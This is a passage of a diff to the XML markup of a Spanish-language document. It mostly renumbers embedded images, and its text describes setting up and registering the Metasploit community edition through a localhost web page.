+            </a:graphic>
+          </wp:anchor>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:b w:val="false"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+        </w:rPr>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:b w:val="false"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+        </w:rPr>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:b w:val="false"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+        </w:rPr>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:b w:val="false"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+        </w:rPr>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:jc w:val="both"/>
+        <w:rPr/>
       </w:pPr>
       <w:r>
         <w:rPr>
@@ -8179,7 +8178,7 @@
             <wp:extent cx="4848860" cy="3629660"/>
             <wp:effectExtent l="0" t="0" r="0" b="0"/>
             <wp:wrapSquare wrapText="largest"/>
-            <wp:docPr id="21" name="Image20" descr=""/>
+            <wp:docPr id="23" name="Image20" descr=""/>
             <wp:cNvGraphicFramePr>
               <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
             </wp:cNvGraphicFramePr>
@@ -8187,13 +8186,13 @@
               <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                 <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                   <pic:nvPicPr>
-                    <pic:cNvPr id="21" name="Image20" descr=""/>
+                    <pic:cNvPr id="23" name="Image20" descr=""/>
                     <pic:cNvPicPr>
                       <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                     </pic:cNvPicPr>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId27"/>
+                    <a:blip r:embed="rId29"/>
                     <a:stretch>
                       <a:fillRect/>
                     </a:stretch>
@@ -8766,7 +8765,7 @@
             <wp:extent cx="4829810" cy="3610610"/>
             <wp:effectExtent l="0" t="0" r="0" b="0"/>
             <wp:wrapSquare wrapText="largest"/>
-            <wp:docPr id="22" name="Image21" descr=""/>
+            <wp:docPr id="24" name="Image21" descr=""/>
             <wp:cNvGraphicFramePr>
               <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
             </wp:cNvGraphicFramePr>
@@ -8774,13 +8773,13 @@
               <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                 <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                   <pic:nvPicPr>
-                    <pic:cNvPr id="22" name="Image21" descr=""/>
+                    <pic:cNvPr id="24" name="Image21" descr=""/>
                     <pic:cNvPicPr>
                       <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                     </pic:cNvPicPr>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId28"/>
+                    <a:blip r:embed="rId30"/>
                     <a:stretch>
                       <a:fillRect/>
                     </a:stretch>
@@ -9172,7 +9171,7 @@
         <w:tab/>
         <w:t xml:space="preserve">Si aparece una página web de localhost, le pedimos que haga clic en el enlace </w:t>
       </w:r>
-      <w:hyperlink r:id="rId29">
+      <w:hyperlink r:id="rId31">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="InternetLink"/>
@@ -9209,7 +9208,7 @@
             <wp:extent cx="6120130" cy="2710180"/>
             <wp:effectExtent l="0" t="0" r="0" b="0"/>
             <wp:wrapSquare wrapText="largest"/>
-            <wp:docPr id="23" name="Image22" descr=""/>
+            <wp:docPr id="25" name="Image22" descr=""/>
             <wp:cNvGraphicFramePr>
               <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
             </wp:cNvGraphicFramePr>
@@ -9217,225 +9216,7 @@
               <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                 <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                   <pic:nvPicPr>
-                    <pic:cNvPr id="23" name="Image22" descr=""/>
-                    <pic:cNvPicPr>
-                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
-                    </pic:cNvPicPr>
-                  </pic:nvPicPr>
-                  <pic:blipFill>
-                    <a:blip r:embed="rId30"/>
-                    <a:stretch>
-                      <a:fillRect/>
-                    </a:stretch>
-                  </pic:blipFill>
-                  <pic:spPr bwMode="auto">
-                    <a:xfrm>
-                      <a:off x="0" y="0"/>
-                      <a:ext cx="6120130" cy="2710180"/>
-                    </a:xfrm>
-                    <a:prstGeom prst="rect">
-                      <a:avLst/>
-                    </a:prstGeom>
-                  </pic:spPr>
-                </pic:pic>
-              </a:graphicData>
-            </a:graphic>
-          </wp:anchor>
-        </w:drawing>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:b w:val="false"/>
-          <w:bCs w:val="false"/>
-        </w:rPr>
-        <w:t>-</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:b w:val="false"/>
-          <w:bCs w:val="false"/>
-        </w:rPr>
-        <w:tab/>
-        <w:t>Aparece una página web de localhost que indica que la conexión no es de confianza. Haga clic en Entiendo los riesgos.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:jc w:val="both"/>
-        <w:rPr/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:b w:val="false"/>
-          <w:bCs w:val="false"/>
-        </w:rPr>
-        <w:t>-</w:t>
-        <w:tab/>
-        <w:t>El nodo Entiendo los riesgos se expande, mostrando un mensaje relacionado con los riesgos de seguridad.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:jc w:val="both"/>
-        <w:rPr/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:b w:val="false"/>
-          <w:bCs w:val="false"/>
-        </w:rPr>
-        <w:t>-</w:t>
-        <w:tab/>
-        <w:t>Click añadir excepción</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:jc w:val="both"/>
-        <w:rPr/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:b w:val="false"/>
-          <w:bCs w:val="false"/>
-        </w:rPr>
-        <w:t>-</w:t>
-        <w:tab/>
-        <w:t>Aparece una ventana para agregar excepciones de seguridad. Haga clic en confirmar excepción de seguridad.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:jc w:val="both"/>
-        <w:rPr/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:b w:val="false"/>
-          <w:bCs w:val="false"/>
-        </w:rPr>
-        <w:t>2.</w:t>
-        <w:tab/>
-        <w:t>Metasploit: aparece la pantalla de inicio de sesión de configuración y configuración. Complete los campos de confirmación de Nombre de usuario, Contraseña y Contraseña y haga clic en crear cuenta.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:jc w:val="both"/>
-        <w:rPr/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:b w:val="false"/>
-          <w:bCs w:val="false"/>
-        </w:rPr>
-        <w:tab/>
-        <w:t>Nota: si está realizando esto en Internet Explorer, es posible que aparezca una ventana emergente de Internet Explorer. Haga clic en cerrar.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:jc w:val="both"/>
-        <w:rPr/>
-      </w:pPr>
-      <w:r>
-        <w:drawing>
-          <wp:anchor behindDoc="0" distT="0" distB="0" distL="0" distR="0" simplePos="0" locked="0" layoutInCell="1" allowOverlap="1" relativeHeight="24">
-            <wp:simplePos x="0" y="0"/>
-            <wp:positionH relativeFrom="column">
-              <wp:align>center</wp:align>
-            </wp:positionH>
-            <wp:positionV relativeFrom="paragraph">
-              <wp:posOffset>635</wp:posOffset>
-            </wp:positionV>
-            <wp:extent cx="6120130" cy="2682240"/>
-            <wp:effectExtent l="0" t="0" r="0" b="0"/>
-            <wp:wrapSquare wrapText="largest"/>
-            <wp:docPr id="24" name="Image23" descr=""/>
-            <wp:cNvGraphicFramePr>
-              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
-            </wp:cNvGraphicFramePr>
-            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
-              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
-                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
-                  <pic:nvPicPr>
-                    <pic:cNvPr id="24" name="Image23" descr=""/>
-                    <pic:cNvPicPr>
-                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
-                    </pic:cNvPicPr>
-                  </pic:nvPicPr>
-                  <pic:blipFill>
-                    <a:blip r:embed="rId31"/>
-                    <a:srcRect l="0" t="0" r="0" b="7018"/>
-                    <a:stretch>
-                      <a:fillRect/>
-                    </a:stretch>
-                  </pic:blipFill>
-                  <pic:spPr bwMode="auto">
-                    <a:xfrm>
-                      <a:off x="0" y="0"/>
-                      <a:ext cx="6120130" cy="2682240"/>
-                    </a:xfrm>
-                    <a:prstGeom prst="rect">
-                      <a:avLst/>
-                    </a:prstGeom>
-                  </pic:spPr>
-                </pic:pic>
-              </a:graphicData>
-            </a:graphic>
-          </wp:anchor>
-        </w:drawing>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:b w:val="false"/>
-          <w:bCs w:val="false"/>
-        </w:rPr>
-        <w:t>-</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:b w:val="false"/>
-          <w:bCs w:val="false"/>
-        </w:rPr>
-        <w:tab/>
-        <w:t>Aparece la ventana de activación de su metasploit. Haga clic en obtener la clave del producto.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:jc w:val="both"/>
-        <w:rPr/>
-      </w:pPr>
-      <w:r>
-        <w:drawing>
-          <wp:anchor behindDoc="0" distT="0" distB="0" distL="0" distR="0" simplePos="0" locked="0" layoutInCell="1" allowOverlap="1" relativeHeight="25">
-            <wp:simplePos x="0" y="0"/>
-            <wp:positionH relativeFrom="column">
-              <wp:align>center</wp:align>
-            </wp:positionH>
-            <wp:positionV relativeFrom="paragraph">
-              <wp:posOffset>635</wp:posOffset>
-            </wp:positionV>
-            <wp:extent cx="6120130" cy="2710180"/>
-            <wp:effectExtent l="0" t="0" r="0" b="0"/>
-            <wp:wrapSquare wrapText="largest"/>
-            <wp:docPr id="25" name="Image24" descr=""/>
-            <wp:cNvGraphicFramePr>
-              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
-            </wp:cNvGraphicFramePr>
-            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
-              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
-                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
-                  <pic:nvPicPr>
-                    <pic:cNvPr id="25" name="Image24" descr=""/>
+                    <pic:cNvPr id="25" name="Image22" descr=""/>
                     <pic:cNvPicPr>
                       <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                     </pic:cNvPicPr>
@@ -9460,19 +9241,127 @@
             </a:graphic>
           </wp:anchor>
         </w:drawing>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+        </w:rPr>
+        <w:t>-</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+        </w:rPr>
+        <w:tab/>
+        <w:t>Aparece una página web de localhost que indica que la conexión no es de confianza. Haga clic en Entiendo los riesgos.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:jc w:val="both"/>
+        <w:rPr/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+        </w:rPr>
+        <w:t>-</w:t>
+        <w:tab/>
+        <w:t>El nodo Entiendo los riesgos se expande, mostrando un mensaje relacionado con los riesgos de seguridad.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:jc w:val="both"/>
+        <w:rPr/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+        </w:rPr>
+        <w:t>-</w:t>
+        <w:tab/>
+        <w:t>Click añadir excepción</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:jc w:val="both"/>
+        <w:rPr/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+        </w:rPr>
+        <w:t>-</w:t>
+        <w:tab/>
+        <w:t>Aparece una ventana para agregar excepciones de seguridad. Haga clic en confirmar excepción de seguridad.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:jc w:val="both"/>
+        <w:rPr/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+        </w:rPr>
+        <w:t>2.</w:t>
+        <w:tab/>
+        <w:t>Metasploit: aparece la pantalla de inicio de sesión de configuración y configuración. Complete los campos de confirmación de Nombre de usuario, Contraseña y Contraseña y haga clic en crear cuenta.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:jc w:val="both"/>
+        <w:rPr/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+        </w:rPr>
+        <w:tab/>
+        <w:t>Nota: si está realizando esto en Internet Explorer, es posible que aparezca una ventana emergente de Internet Explorer. Haga clic en cerrar.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:jc w:val="both"/>
+        <w:rPr/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+        </w:rPr>
+        <w:t>-</w:t>
         <w:drawing>
-          <wp:anchor behindDoc="0" distT="0" distB="0" distL="0" distR="0" simplePos="0" locked="0" layoutInCell="1" allowOverlap="1" relativeHeight="26">
+          <wp:anchor behindDoc="0" distT="0" distB="0" distL="0" distR="0" simplePos="0" locked="0" layoutInCell="1" allowOverlap="1" relativeHeight="24">
             <wp:simplePos x="0" y="0"/>
             <wp:positionH relativeFrom="column">
-              <wp:posOffset>-9525</wp:posOffset>
+              <wp:align>center</wp:align>
             </wp:positionH>
             <wp:positionV relativeFrom="paragraph">
-              <wp:posOffset>3086735</wp:posOffset>
+              <wp:posOffset>635</wp:posOffset>
             </wp:positionV>
-            <wp:extent cx="6120130" cy="2710180"/>
+            <wp:extent cx="6120130" cy="2682240"/>
             <wp:effectExtent l="0" t="0" r="0" b="0"/>
             <wp:wrapSquare wrapText="largest"/>
-            <wp:docPr id="26" name="Image25" descr=""/>
+            <wp:docPr id="26" name="Image23" descr=""/>
             <wp:cNvGraphicFramePr>
               <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
             </wp:cNvGraphicFramePr>
@@ -9480,13 +9369,69 @@
               <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                 <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                   <pic:nvPicPr>
-                    <pic:cNvPr id="26" name="Image25" descr=""/>
+                    <pic:cNvPr id="26" name="Image23" descr=""/>
                     <pic:cNvPicPr>
                       <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                     </pic:cNvPicPr>
                   </pic:nvPicPr>
                   <pic:blipFill>
                     <a:blip r:embed="rId33"/>
+                    <a:srcRect l="0" t="0" r="0" b="7018"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr bwMode="auto">
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="6120130" cy="2682240"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:anchor>
+        </w:drawing>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+        </w:rPr>
+        <w:tab/>
+        <w:t xml:space="preserve">Aparece la ventana de activación de su metasploit. Haga clic en obtener la clave del </w:t>
+      </w:r>
+      <w:r>
+        <w:drawing>
+          <wp:anchor behindDoc="0" distT="0" distB="0" distL="0" distR="0" simplePos="0" locked="0" layoutInCell="1" allowOverlap="1" relativeHeight="25">
+            <wp:simplePos x="0" y="0"/>
+            <wp:positionH relativeFrom="column">
+              <wp:posOffset>6350</wp:posOffset>
+            </wp:positionH>
+            <wp:positionV relativeFrom="paragraph">
+              <wp:posOffset>3052445</wp:posOffset>
+            </wp:positionV>
+            <wp:extent cx="6120130" cy="2710180"/>
+            <wp:effectExtent l="0" t="0" r="0" b="0"/>
+            <wp:wrapSquare wrapText="largest"/>
+            <wp:docPr id="27" name="Image24" descr=""/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="27" name="Image24" descr=""/>
+                    <pic:cNvPicPr>
+                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
+                    </pic:cNvPicPr>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId34"/>
                     <a:stretch>
                       <a:fillRect/>
                     </a:stretch>
@@ -9511,6 +9456,74 @@
           <w:b w:val="false"/>
           <w:bCs w:val="false"/>
         </w:rPr>
+        <w:t>p</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+        </w:rPr>
+        <w:t>roducto.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:jc w:val="both"/>
+        <w:rPr/>
+      </w:pPr>
+      <w:r>
+        <w:drawing>
+          <wp:anchor behindDoc="0" distT="0" distB="0" distL="0" distR="0" simplePos="0" locked="0" layoutInCell="1" allowOverlap="1" relativeHeight="26">
+            <wp:simplePos x="0" y="0"/>
+            <wp:positionH relativeFrom="column">
+              <wp:posOffset>-9525</wp:posOffset>
+            </wp:positionH>
+            <wp:positionV relativeFrom="paragraph">
+              <wp:posOffset>3086735</wp:posOffset>
+            </wp:positionV>
+            <wp:extent cx="6120130" cy="2710180"/>
+            <wp:effectExtent l="0" t="0" r="0" b="0"/>
+            <wp:wrapSquare wrapText="largest"/>
+            <wp:docPr id="28" name="Image25" descr=""/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="28" name="Image25" descr=""/>
+                    <pic:cNvPicPr>
+                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
+                    </pic:cNvPicPr>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId35"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr bwMode="auto">
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="6120130" cy="2710180"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:anchor>
+        </w:drawing>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+        </w:rPr>
         <w:t>-</w:t>
       </w:r>
       <w:r>
@@ -9520,6 +9533,20 @@
         </w:rPr>
         <w:tab/>
         <w:t>¡Aparece una ventana con las dos ofertas gratuitas de Metasploit! Título. Haga clic en obtener la edición de la comunidad en la comunidad metasploit.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:b w:val="false"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr/>
       </w:r>
     </w:p>
     <w:p>
@@ -9557,7 +9584,7 @@
             <wp:extent cx="6120130" cy="3062605"/>
             <wp:effectExtent l="0" t="0" r="0" b="0"/>
             <wp:wrapSquare wrapText="largest"/>
-            <wp:docPr id="27" name="Image26" descr=""/>
+            <wp:docPr id="29" name="Image26" descr=""/>
             <wp:cNvGraphicFramePr>
               <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
             </wp:cNvGraphicFramePr>
@@ -9565,13 +9592,13 @@
               <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                 <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                   <pic:nvPicPr>
-                    <pic:cNvPr id="27" name="Image26" descr=""/>
+                    <pic:cNvPr id="29" name="Image26" descr=""/>
                     <pic:cNvPicPr>
                       <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                     </pic:cNvPicPr>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId34"/>
+                    <a:blip r:embed="rId36"/>
                     <a:stretch>
                       <a:fillRect/>
                     </a:stretch>
@@ -9650,7 +9677,7 @@
             <wp:extent cx="5503545" cy="2199005"/>
             <wp:effectExtent l="0" t="0" r="0" b="0"/>
             <wp:wrapSquare wrapText="largest"/>
-            <wp:docPr id="28" name="Image27" descr=""/>
+            <wp:docPr id="30" name="Image27" descr=""/>
             <wp:cNvGraphicFramePr>
               <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
             </wp:cNvGraphicFramePr>
@@ -9658,13 +9685,13 @@
               <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                 <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                   <pic:nvPicPr>
-                    <pic:cNvPr id="28" name="Image27" descr=""/>
+                    <pic:cNvPr id="30" name="Image27" descr=""/>
                     <pic:cNvPicPr>
                       <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                     </pic:cNvPicPr>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId35"/>
+                    <a:blip r:embed="rId37"/>
                     <a:stretch>
                       <a:fillRect/>
                     </a:stretch>
@@ -9924,7 +9951,7 @@
             <wp:extent cx="6120130" cy="2701290"/>
             <wp:effectExtent l="0" t="0" r="0" b="0"/>
             <wp:wrapSquare wrapText="largest"/>
-            <wp:docPr id="29" name="Image28" descr=""/>
+            <wp:docPr id="31" name="Image28" descr=""/>
             <wp:cNvGraphicFramePr>
               <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
             </wp:cNvGraphicFramePr>
@@ -9932,13 +9959,13 @@
               <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                 <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                   <pic:nvPicPr>
-                    <pic:cNvPr id="29" name="Image28" descr=""/>
+                    <pic:cNvPr id="31" name="Image28" descr=""/>
                     <pic:cNvPicPr>
                       <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                     </pic:cNvPicPr>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId36"/>
+                    <a:blip r:embed="rId38"/>
                     <a:stretch>
                       <a:fillRect/>
                     </a:stretch>
@@ -9997,6 +10024,11 @@
         <w:rPr/>
       </w:pPr>
       <w:r>
+        <w:rPr>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+        </w:rPr>
+        <w:t>3</w:t>
         <w:drawing>
           <wp:anchor behindDoc="0" distT="0" distB="0" distL="0" distR="0" simplePos="0" locked="0" layoutInCell="1" allowOverlap="1" relativeHeight="30">
             <wp:simplePos x="0" y="0"/>
@@ -10009,7 +10041,7 @@
             <wp:extent cx="6120130" cy="2714625"/>
             <wp:effectExtent l="0" t="0" r="0" b="0"/>
             <wp:wrapSquare wrapText="largest"/>
-            <wp:docPr id="30" name="Image29" descr=""/>
+            <wp:docPr id="32" name="Image29" descr=""/>
             <wp:cNvGraphicFramePr>
               <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
             </wp:cNvGraphicFramePr>
@@ -10017,13 +10049,13 @@
               <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                 <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                   <pic:nvPicPr>
-                    <pic:cNvPr id="30" name="Image29" descr=""/>
+                    <pic:cNvPr id="32" name="Image29" descr=""/>
                     <pic:cNvPicPr>
                       <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                     </pic:cNvPicPr>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId37"/>
+                    <a:blip r:embed="rId39"/>
                     <a:stretch>
                       <a:fillRect/>
                     </a:stretch>
@@ -10048,38 +10080,24 @@
           <w:b w:val="false"/>
           <w:bCs w:val="false"/>
         </w:rPr>
-        <w:t>3</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:b w:val="false"/>
-          <w:bCs w:val="false"/>
-        </w:rPr>
         <w:t>.</w:t>
         <w:tab/>
-        <w:t>Aparece la página de inicio de sesión. Ingrese las credenciales proporcionadas en el momento del registro y haga clic en iniciar sesión.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:jc w:val="both"/>
-        <w:rPr/>
-      </w:pPr>
+        <w:t xml:space="preserve">Aparece la página de inicio de sesión. Ingrese las credenciales proporcionadas en el </w:t>
+      </w:r>
       <w:r>
         <w:drawing>
           <wp:anchor behindDoc="0" distT="0" distB="0" distL="0" distR="0" simplePos="0" locked="0" layoutInCell="1" allowOverlap="1" relativeHeight="31">
             <wp:simplePos x="0" y="0"/>
             <wp:positionH relativeFrom="column">
-              <wp:posOffset>0</wp:posOffset>
+              <wp:posOffset>-6350</wp:posOffset>
             </wp:positionH>
             <wp:positionV relativeFrom="paragraph">
-              <wp:posOffset>635</wp:posOffset>
+              <wp:posOffset>3248025</wp:posOffset>
             </wp:positionV>
             <wp:extent cx="6120130" cy="2514600"/>
             <wp:effectExtent l="0" t="0" r="0" b="0"/>
             <wp:wrapSquare wrapText="largest"/>
-            <wp:docPr id="31" name="Image30" descr=""/>
+            <wp:docPr id="33" name="Image30" descr=""/>
             <wp:cNvGraphicFramePr>
               <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
             </wp:cNvGraphicFramePr>
@@ -10087,13 +10105,13 @@
